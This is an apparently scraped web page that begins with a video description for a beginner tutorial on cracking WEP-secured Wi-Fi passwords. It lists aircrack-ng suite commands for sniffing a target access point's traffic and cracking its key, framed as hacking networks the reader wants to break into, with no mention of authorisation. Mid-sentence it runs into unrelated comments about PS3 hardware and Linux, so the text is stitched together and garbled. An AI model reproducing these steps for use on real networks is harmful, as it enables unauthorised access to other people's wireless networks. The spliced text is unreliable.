This is very easy(Noob-Friendly) yet detailed tutorial on how to hack WEP-Secured wireless network passwords. This video shows how to do it on a Windows OS(XP, Vista, 7) or a Linux OS. There are two reasons why I used a virtual OS rather then running the cracking tool locally in a Windows environment; 1 – I want this tutorial to assist not only Windows-Users but also Linux-Users and 2 – Compatibility issues are very common with airmon-ng when using in the Windows Environment and will not only limit the amount of people who are able to do it but also complicate the procedure for beginners. – Commands Used: airmon-ng (Shows connected network adapters/devices) airodump-ng wlan0 (Shows available networks on the wlan0 network adapter – Your network adapter name may differ) airodump-ng -w passcode –bssid 00:18:39:7C:3F:D6 -C 6 wlan0 (Writes intercepted/sniffed IV’s to a CAP document called passcode. The bssid specifies the Mac Address of the Access Point you are wanting to crack so the Mac Address should differ from what I use. The Channel may also differ depending on what’s displayed for you. Same goes for the network adapter) dir (Shows files in the current directory) aircrack-ng -a 1 -b 00:18:39:7C:3F:D6 FILENAME.cap (Cracks the IV’s in the Cab file created via the airodump-ng command. the ps3 doesn’t have cores, the cell has units called SPE’s which are not cores at all, cores run in parallel and have cache built into the core, the SPE’s do not, the PPE is close to a core, but only close. this guy sounds like he needs to take some classes on hardware.
@ChoppstickzEMS it does use all the processors, even the psone classics do. its just the optimization of the code that factors on what the cell broadband engine can do.

@g2g6599 Lawl out run a computer any day not saying its not a game console but saying that it will outrun a computer any day is laughable its like saying a clown car will out run a dragster just because someone put a bigger engine in it, PS3 and Xbox360 when they came out where good compared to computers but months after they came out there was better video cards and what not and now for a little over $100 and you got a video card that beats the gaming power of PS3 and 360.
My PS3 Linux is awesome! It makes the personification of Windows look like an angry thug. If you’re emotionally invested in computational hardware for the purpose of playing games, the PS3 does in fact have an impressive processor – you can not deny it.

I have to say, i have a 360, and i thought i liked it better. But the capabilities of the PS3 is astounding. To me, when i play my friends PS3, it just seems cooler, and more powerful (obviously). I might have to get one

go and search for Removal of “Other OS” feature, on PS3 is unacceptable on facebook and becoem member. we need you guys. so that we can sned a list to sony that we want other os feature back on ps3

When i used Linux, it was VERY slow at startup and so on, but when i think about it, it might also be related to what version i used.
About the GPU, do you mean they found a way to use it?
i dont mean ways around it with the GPU, but they are other ways, if you search youtube and even forums people discussion how to do it
no its not incredibly slow at times, in fact its never slow, i have had linux for almost a year and i had never a problem with it. its prob only slow becuase your internet isn’t that fast.
everthing i can do on a comptur i can do on linux, if do some research they are always ways around doin it, like i can even get MSN on linux now before you counld’t. a laptop maybe better in some ways but havin some sort of a comptur in a ps3 incredible you dont see xbox havin this capability
1 – It’s incredibly slow at times.
2 – Linux is not very user friendly.
3 – The GPU is blocked.
4 – Don’t even think about playing games requiring a GPU.
5 – I’ve done this myself, but i figured out my laptop was better at being a computer than my PS3. (My PS3 is for games now)
